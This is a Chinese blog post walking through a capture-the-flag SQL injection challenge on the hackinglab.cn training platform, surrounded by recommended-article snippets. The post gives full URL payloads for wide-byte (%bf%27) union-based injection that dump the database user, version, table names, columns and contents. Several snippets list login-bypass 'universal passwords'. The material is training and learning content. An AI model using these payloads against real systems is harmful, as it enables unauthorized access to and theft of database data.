网络信息安全学习平台--注入关第5题

最新推荐文章于 2023-02-20 21:26:21 发布
最新推荐文章于 2023-02-20 21:26:21 发布
阅读量2.8k 收藏
点赞数
分类专栏: SQL注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zhankehua/article/details/51697945
版权

网络信息安全学习平台网址:http://hackinglab.cn/

1、在网页注释的提示中,id=1,原以为注入点是id,结果经过多次测试,无法注入。网上搜索,得到提示是图片注入。
2、从图片入手,输入如下内容,产生错误提示如下图
http://lab1.xseclab.com/sqli6_f37a4a60a4a234cd309ce48ce45b9b00/images/cat1.jpg%bf%27

说明确定存在注入点
注:使用的是Firefox上的httpRequest插件。使用burp suit未出现以上提示。
3、输入以下内容,爆库名
http://lab1.xseclab.com/sqli6_f37a4a60a4a234cd309ce48ce45b9b00/images/cat1.jpg%bf%27%20union SELECT 1,2,concat(user(),0x20,database(),0x20,version()),4 limit 0,2%23

4、爆表名
http://lab1.xseclab.com/sqli6_f37a4a60a4a234cd309ce48ce45b9b00/images/cat1.jpg%bf%27%20union SELECT 1,2,TABLE_NAME,4 FROM information_schema.TABLES%20where%20table_SCHEMA=0x723034363663706c7573687561 limit 1,1%23

5、爆列
http://lab1.xseclab.com/sqli6_f37a4a60a4a234cd309ce48ce45b9b00/images/cat1.jpg%bf%27%20union SELECT 1,2,COLUMN_NAME,4 FROM information_schema.COLUMNS%20where%20table_NAME=0x706963 limit 1,1%23

6、爆字段内容
http://lab1.xseclab.com/sqli6_f37a4a60a4a234cd309ce48ce45b9b00/images/cat1.jpg%bf%27%20union SELECT 1,2,picname,4 FROM pic limit 2,5%23

这里要注意,如果limit写成1,1那么只显示cat1.jpg内容
把limit设置成0,5你就明白什么意思了

7、访问图片地址,看看结果吧


幽狼传说
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
网络信息与安全--第二次作业.docx
07-14
网络信息与安全--第二次作业全文共5页,当前为第1页。网络信息与安全--第二次作业全文共5页,当前为第1页。网络信息与安全 第二次作业 网络信息与安全--第二次作业全文共5页,当前为第1页。 网络信息与安全--第二次...
网络安全攻防实验室通关教程-注入
黑面狐
10-19 1万+
网络安全实验室传送门: 地址:http://hackinglab.cn  第一:最简单的SQL注入 查看网页源码,获取到提示,要登录admin 所以构造用户名  admin' or 'a'='a'#   密码随便填, 获取到flag 第2:最简单的sql注入(熟悉环境) 查看网页源码获得提示参数id=1  是数字型注入 于是构造url    index.
CTF-网络信息安全攻防学习平台(注入关)
丶没胡子的猫
07-07 2762
注入关第关第关第三关 库地址:http://hackinglab.cn 第一关 目:         最简单的SQL注入         分值: 100         Tips目里有简单提示 Writeup: 像看到SQL注入,还是登陆框,就可以先试试
CTF解-网安实验室(注入关)
道阻且长,行则将至。
09-03 3918
万能密码 【目环境】 最简单的SQL注入 分值: 100 Tips:目里有简单提示 通关地址 【解过程】 查看网页源码,提示使用admin登录: 直接上万能密码——admin';#、admin' #、admin' or 1=1 #密码随便输,登录成功: ...
sql注入之万能密码总结
weixin_45778886的博客
12-03 1万+
万能密码 万能密码原理 原验证登陆句: SELECT * FROM admin WHERE Username= '".$username."' AND Password= '".md5($password)."' 输入 1′ or 1=1 or ‘1’=’1万能密码句变为: SELECT * FROM admin WHERE Username='1' OR 1=1 OR '1'='1' AND Password='EDFKGMZDFSDFDSFRRQWERRFGGG' 即得到优先级关系:or&lt
网络安全实验室注入关 -----wiiteup
xiaoqi199915的博客
06-05 771
作为一个刷的小白,相信有很多和我一样的小白,我就在这记录自己的刷吧,一步步来,希望对大家有帮助 第一 F12 查看源码 发现登录的是admin 尝试一下万能密码 怎么使用万能密码呢,刚刷提的小白也许不懂吧,反正我不懂 下面介绍几个万能密码 (1)直接登录框 输入admin’# 密码的话就随便填几个就行 无所谓的 验证码正确就可以 username = admin’ or ‘’=’ 第二种 假如不知道是admin登录的话 直接账号输入万能用户名 密码随便一样可以 asp aspx万能密码 1: "
网络安全精品】5-云环境下侧信道攻击技术0908-第二版-云会场版本.rar
最新发布
04-23
《云环境下侧信道攻击技术0908-第二版-云会场版本》是一份专注于网络安全的精品资料,旨在帮助读者深入理解并有效应对在云计算环境中日益复杂的侧信道攻击。这份资料融合了最新的研究成果和实战案例,为网络安全专业...
网络安全实用项目教程-项目3-网络数据库安全.pptx
06-09
网络安全实用项目教程-项目3-网络数据库安全全文共63页,当前为第5页。 计算机网络安全项目教程 2011年底, CSDN、天涯等网站发生用户信息泄露事件引起社会广泛关注,被公开的疑似泄露数据库26个,涉及帐号、密码...
网络安全》-课程标准.doc
06-07
8) 能依据网络安全相关法规,应急处理基本的信息安全事件。 2.方法能力 (1)自主学习获取信息的能力; (2)决策与规划的能力; (3)自我控制与管理的能力; (4)评价执行结果的能力。 3.社会能力 (1)很强的...
网站安全狗Linux-Nginx版(32位)v2.4.2.gz
07-17
通过安全狗服云平台,可以对DDOS攻击防护、CC攻击防护等功能进行操作设置,无需通过linux系统操作,与传统的linux字符界面相比,Web界面更易懂更易操作。 安全狗linux版功能简介 1)CC攻击防护 CC攻击防护基本...
网络安全实验室 注入关通关writeup
03-12 414
URL:http://hackinglab.cn 注入关 [1] 最简单的SQL注入username = admin' or ''='password随便什么都可以直接可以登录 [2] 熟悉注入环境username = admin or 1=1 password 随便什么 [3] 防注入根据响应头中返回的 charset=gb2312 ,猜测可能是一个宽字节注入,通过验证后开始正...
网络安全实验室--SQL注入
S1lenc3的博客
11-05 251
第一关 万能密码:username='or '1'='1'# password=1 即可登录得到flag。 第二关 最基础的注入,order by 判断字段数,然后 union select 查询表,列,字段。 payload:id=1 union select 1,database(),3 from information_schema.tables where t...
CTF writeup 1_网络安全实验室
热门推荐
Troy
10-26 31万+
基础关1.key在哪里? 过关地址打开网址 “key就在这里中,你能找到他吗? ” 看看源代码有没有线索~果然<html> <head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> </head> <body> key就在这里中,你能找到他吗?
sql注入之万能密码
wuqingsix的博客
02-20 1498
16: 用户名 ’ UNION Select 1,1,1 FROM admin Where ”=’ (替换表名admin)admin’ or ‘a’=’a 密码随便。
网络安全实验室CTF—注入关 writeup
Senimo
08-02 2252
网络安全实验室CTF—注入关 writeup最简单的SQL注入最简单的SQL注入(熟悉注入环境)防注入到底能不能回显邂逅ErrorBased盲注SQL注入通用防护据说哈希后的密码是不能产生注入网络安全实验室CTF链接 最简单的SQL注入 最简单的SQL注入(熟悉注入环境) 防注入 到底能不能回显 邂逅 ErrorBased 盲注 SQL注入通用防护 据说哈希后的密码是不能产生注入的 ...
网络信息安全学习平台---注入关第7
幽狼传说
06-21 3015
网络信息安全学习平台网址:http://hackinglab.cn/ sql盲注:目内容见平台上的第7 我主要使用的基于时间的盲注,其它类型的盲注可自行测试 1、首先要确定数据库名的长度 输入 http://lab1.xseclab.com/sqli7_b95cf5af3a5fbeca02564bffc63e92e5/blind.php?username=admin'  and
网络信息安全学习平台---注入关第3
幽狼传说
06-16 3134
第3注入终于知道原来黑客如此的吊,还有sql注入这种高端技术,因此他开始学习注入! flag是随机序列 在做本时,想到了很多编码方法,结果就是不报错,没有任何反映。后来在查看提示(有人在讨论中提到宽这字节注入) 心想,所有的方法都试了,唯独宽字节没试,以前也没接触过宽字节,网上搜索了一些资料后,在本测试结果真的报错了。 说存在宽字节注入知道注入,那
hackinglab上传关第
weixin_30684743的博客
04-07 119
请上传一张jpg格式的图片 分值: 100 只能上传jpg格式的图片哦~! 通关地址 看源码,js做的文件后缀验证,极端不安全。由于我没有开brupsuit,所以将源代码复制到本地,新建一个html,内容如下: <html> <head> <meta http-equiv=Content-Type content="text/html...
网络安全实验室注入关(邂逅wp)
baidu_39504221的博客
12-08 833
习惯性查看源码,看到 以为用id注入,试了get和post,一点反应都没有(= =) 打开百度,大佬都说是图片宽字节注入 奇怪的是我怎么抓包都抓不到图片那个包,后来发现 这里勾上了,我去 好了,进入正 这里加一个单引号是不会报错的,加了个%df才报错,宽字节无疑了 走个流程 orederby加查看回显位置 %df%27order by 5%23 一直到5才报错,说有4个字段 %df%...
sql-labs第24关二次注入
07-28
对于 SQL-Labs 第 24 关的二次注入,你可以尝试以下步骤来完成任务: 1. 理解目标:首先,你需要了解任务的目标是什么。二次注入通常发生在用户输入被直接拼接到 SQL 查询句中的情况。了解目标有助于你确定注入点...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值